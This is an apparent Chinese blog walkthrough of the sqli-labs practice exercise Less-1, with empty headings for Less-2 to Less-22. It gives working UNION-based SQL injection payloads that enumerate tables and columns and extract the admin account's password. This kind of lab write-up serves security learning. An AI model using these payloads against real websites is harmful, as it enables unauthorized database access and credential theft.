一、 Page-1(Basic Challenges)
【Less-1】
①判断是否存在注入
输入参数,有输出

id=1’有报错,证明有注入点

②猜解SQL查询语句中的字段数
Order by 3 正常:

Order by 4 不正常:

所以字段数为3
③确定显示的字段
2和3是显示位:

④获取当前数据库、版本

⑤获取数据库中的表
?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+

⑥获取表中的字段名
?id=-1’ union select 1,group_concat(column_name),3
from information_schema.columns where table_name=‘users’–+’

⑦拿到账号密码
?id=-1’ union select 1,concat(username,’@@’,password),3 from users where username=“admin”–+’
拿到admin的账号密码

【Less-2】
【Less-3】
【Less-4】
【Less-5】
【Less-6】
【Less-7】
【Less-8】
【Less-9】
【Less-10】
【Less-11】
【Less-12】
【Less-13】
【Less-14】
【Less-15】
【Less-16】
【Less-17】
【Less-18】
【Less-19】
【Less-20】
【Less-21】
【Less-22】
本文详细介绍了如何通过SQL注入攻击来探测网站的安全漏洞,包括判断注入点存在、猜解SQL查询语句字段数、获取数据库信息及用户账号密码等步骤。
396

被折叠的 条评论
为什么被折叠?



